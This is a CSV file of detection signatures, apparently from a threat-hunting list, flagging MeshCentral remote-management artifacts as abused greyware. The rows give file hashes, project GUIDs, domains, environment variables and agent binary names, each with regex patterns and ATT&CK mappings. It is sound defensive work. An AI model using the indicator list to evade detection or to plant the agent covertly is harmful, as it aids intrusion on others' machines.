"*3f47dae30e9b18dcfd50eef1d188f83171072136257758ea39997818f38d49e8*",".{0,1000}3f47dae30e9b18dcfd50eef1d188f83171072136257758ea39997818f38d49e8.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","#filehash","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*43861355ea40db311824a51d5a4c6dc773ebfc0c5862a252a4692847f184594c*",".{0,1000}43861355ea40db311824a51d5a4c6dc773ebfc0c5862a252a4692847f184594c.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","#filehash","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*460acbb38b0bdb3d227de65010b1a323f448ec196860ce4979c0b8314763eb56*",".{0,1000}460acbb38b0bdb3d227de65010b1a323f448ec196860ce4979c0b8314763eb56.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","#filehash","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*68257a6f9ff196179ec03624e849927f26599eb180a7c82e14ef5bc4e93bc309*",".{0,1000}68257a6f9ff196179ec03624e849927f26599eb180a7c82e14ef5bc4e93bc309.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","#filehash","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*70f1ed3ea1ba5d2fe5430735089f03cbce1b85a4c719ad2adc7d1049345f2b6c*",".{0,1000}70f1ed3ea1ba5d2fe5430735089f03cbce1b85a4c719ad2adc7d1049345f2b6c.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","#filehash","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*77432fd21f975da9215b15efc8e0080345732102f7d57a5d9d57f61faa4dfa20*",".{0,1000}77432fd21f975da9215b15efc8e0080345732102f7d57a5d9d57f61faa4dfa20.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","#filehash","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*7777E837-E7A3-481B-8BD2-4C76F639ECFC*",".{0,1000}7777E837\-E7A3\-481B\-8BD2\-4C76F639ECFC.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshAgent","1","0","#GUIDproject","N/A","10","3","210","82","2024-08-12T17:16:44Z","2017-10-12T21:26:52Z"
"*7f68729cb251f5aa9ecba08e57f13c8a258ea3cb3c45e7f99881ca496a639d7e*",".{0,1000}7f68729cb251f5aa9ecba08e57f13c8a258ea3cb3c45e7f99881ca496a639d7e.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","#filehash","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*8365dc72d291194a2b3bd59e36473db7404a219fe999c50dad3d793c3a3178e4*",".{0,1000}8365dc72d291194a2b3bd59e36473db7404a219fe999c50dad3d793c3a3178e4.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","#filehash","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*8cec1c5a5e6e7e7a7b2d2991e12587228ed2aa9428b1af003ff68dd6bd6994a4*",".{0,1000}8cec1c5a5e6e7e7a7b2d2991e12587228ed2aa9428b1af003ff68dd6bd6994a4.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","#filehash","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*92f384f789dae517d1da7493322db430f5a7d4a6b7d7b74ca3b075bfac881b15*",".{0,1000}92f384f789dae517d1da7493322db430f5a7d4a6b7d7b74ca3b075bfac881b15.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","#filehash","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*96fb297f3cba18a95a7228a4853a0641d193859999a5488b0cbae6efe708e89c*",".{0,1000}96fb297f3cba18a95a7228a4853a0641d193859999a5488b0cbae6efe708e89c.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","#filehash","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*a0c293a144cb66f4b07d8bd7d52a489b89c2ff30af9427c399e400bc3d374505*",".{0,1000}a0c293a144cb66f4b07d8bd7d52a489b89c2ff30af9427c399e400bc3d374505.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","#filehash","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*aeabd0eed04e87b955809822a4696df781a25ccb649f097a523d1cb4cf93a567*",".{0,1000}aeabd0eed04e87b955809822a4696df781a25ccb649f097a523d1cb4cf93a567.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshAgent","1","0","#filehash","N/A","10","3","210","82","2024-08-12T17:16:44Z","2017-10-12T21:26:52Z"
"*AgentCore/MeshServer_*",".{0,1000}AgentCore\/MeshServer_.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*alt.meshcentral.com*",".{0,1000}alt\.meshcentral\.com.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*c0b17012581f088528c73adb9f228a99bad35ee0a9f74e1a93e688f95d11080f*",".{0,1000}c0b17012581f088528c73adb9f228a99bad35ee0a9f74e1a93e688f95d11080f.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","#filehash","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*c3f35c99bf40d43b4eaa759a92f9a1bc5fc3ddcd0f35d338302a9e88cbdf995a*",".{0,1000}c3f35c99bf40d43b4eaa759a92f9a1bc5fc3ddcd0f35d338302a9e88cbdf995a.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","#filehash","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*c75e682dd8f063bd0c151b30095bae8061146928f6d8533ac983280ad2c6effc*",".{0,1000}c75e682dd8f063bd0c151b30095bae8061146928f6d8533ac983280ad2c6effc.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","#filehash","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*cc94b15863602ae52934d4c3c08db27c61c1530a483093b82a1029a41c4fbd60*",".{0,1000}cc94b15863602ae52934d4c3c08db27c61c1530a483093b82a1029a41c4fbd60.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","#filehash","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*CE5AD78C-DBDF-4D81-9A69-41B1DF683115*",".{0,1000}CE5AD78C\-DBDF\-4D81\-9A69\-41B1DF683115.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshAgent","1","0","#GUIDproject","N/A","10","3","210","82","2024-08-12T17:16:44Z","2017-10-12T21:26:52Z"
"*CE62CBEE-DAA8-4E5E-AAAA-1F6FC291AB94*",".{0,1000}CE62CBEE\-DAA8\-4E5E\-AAAA\-1F6FC291AB94.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshAgent","1","0","#GUIDproject","N/A","10","3","210","82","2024-08-12T17:16:44Z","2017-10-12T21:26:52Z"
"*d3e630985cb4b429375d79dd506842da176a9cbe4e0afb992c694cab48f3e7ce*",".{0,1000}d3e630985cb4b429375d79dd506842da176a9cbe4e0afb992c694cab48f3e7ce.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","#filehash","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*d8445e3bd78bac3cc8f8a3f23b68ab971fb85ff061059f8256e41c6b892374f4*",".{0,1000}d8445e3bd78bac3cc8f8a3f23b68ab971fb85ff061059f8256e41c6b892374f4.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","#filehash","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*E377F156-BAED-4086-B534-3CC43164607A*",".{0,1000}E377F156\-BAED\-4086\-B534\-3CC43164607A.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshAgent","1","0","#GUIDproject","N/A","10","3","210","82","2024-08-12T17:16:44Z","2017-10-12T21:26:52Z"
"*e7e6fcf7d0b2ce3732fbeb5c7e48bb4a2f9f8bbca49ad55d13a57e9abb661481*",".{0,1000}e7e6fcf7d0b2ce3732fbeb5c7e48bb4a2f9f8bbca49ad55d13a57e9abb661481.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","#filehash","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*ff98ae3248a0c2d93b00ec2d426578a3b90aec301883662b8da0fb2a213d60ca*",".{0,1000}ff98ae3248a0c2d93b00ec2d426578a3b90aec301883662b8da0fb2a213d60ca.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","#filehash","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*https://meshcentral.com/login*",".{0,1000}https\:\/\/meshcentral\.com\/login.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshAgent","1","1","N/A","N/A","10","3","210","82","2024-08-12T17:16:44Z","2017-10-12T21:26:52Z"
"*info.meshcentral.com*",".{0,1000}info\.meshcentral\.com.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*MESH_AGENT_PORT*",".{0,1000}MESH_AGENT_PORT.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshAgent","1","0","N/A","N/A","10","3","210","82","2024-08-12T17:16:44Z","2017-10-12T21:26:52Z"
"*MESH_AGENT_STUN_PORT*",".{0,1000}MESH_AGENT_STUN_PORT.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshAgent","1","0","N/A","N/A","10","3","210","82","2024-08-12T17:16:44Z","2017-10-12T21:26:52Z"
"*MeshAgent Crash Dumps*",".{0,1000}MeshAgent\sCrash\sDumps.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*meshagent.exe*",".{0,1000}meshagent\.exe.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*meshagent.js*",".{0,1000}meshagent\.js.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*MeshAgent.mpkg*",".{0,1000}MeshAgent\.mpkg.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*meshagent.pid*",".{0,1000}meshagent\.pid.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*meshagent.service*",".{0,1000}meshagent\.service.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*meshagent.zip*",".{0,1000}meshagent\.zip.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*meshagent_aarch64*",".{0,1000}meshagent_aarch64.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*meshagent_aarch64-cortex-a53*",".{0,1000}meshagent_aarch64\-cortex\-a53.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*meshagent_alpine-x86-64*",".{0,1000}meshagent_alpine\-x86\-64.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*meshagent_android.apk*",".{0,1000}meshagent_android\.apk.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*meshagent_arm*",".{0,1000}meshagent_arm.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*meshagent_arm64*",".{0,1000}meshagent_arm64.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*meshagent_armhf*",".{0,1000}meshagent_armhf.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*meshagent_freebsd_x86-64*",".{0,1000}meshagent_freebsd_x86\-64.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*meshagent_mips*",".{0,1000}meshagent_mips.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*meshagent_mips24kc*",".{0,1000}meshagent_mips24kc.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*meshagent_mipsel24kc*",".{0,1000}meshagent_mipsel24kc.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*meshagent_openbsd_x86-64*",".{0,1000}meshagent_openbsd_x86\-64.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*meshagent_openwrt_x86_64*",".{0,1000}meshagent_openwrt_x86_64.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*meshagent_osx64.msh*",".{0,1000}meshagent_osx64\.msh.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*meshagent_osx64_LaunchDaemon*",".{0,1000}meshagent_osx64_LaunchDaemon.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*meshagent_osx-arm-64*",".{0,1000}meshagent_osx\-arm\-64.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*meshagent_osx-universal-64*",".{0,1000}meshagent_osx\-universal\-64.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*meshagent_osx-x86-32*",".{0,1000}meshagent_osx\-x86\-32.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*meshagent_osx-x86-64*",".{0,1000}meshagent_osx\-x86\-64.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*meshagent_pogo*",".{0,1000}meshagent_pogo.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*meshagent_poky*",".{0,1000}meshagent_poky.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*meshagent_poky64*",".{0,1000}meshagent_poky64.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*meshagent_x86*",".{0,1000}meshagent_x86.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*meshagent_x86-64*",".{0,1000}meshagent_x86\-64.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*meshagent32.exe*",".{0,1000}meshagent32\.exe.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*meshagent64.exe*",".{0,1000}meshagent64\.exe.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*MeshAgent-Android-x86*",".{0,1000}MeshAgent\-Android\-x86.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*meshagentarm64.exe*",".{0,1000}meshagentarm64\.exe.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*MeshAgent-ChromeOS*",".{0,1000}MeshAgent\-ChromeOS.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*MeshAgent-Linux-ARM-PlugPC*",".{0,1000}MeshAgent\-Linux\-ARM\-PlugPC.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
"*MeshAgent-Linux-XEN-x86-32*",".{0,1000}MeshAgent\-Linux\-XEN\-x86\-32.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z"
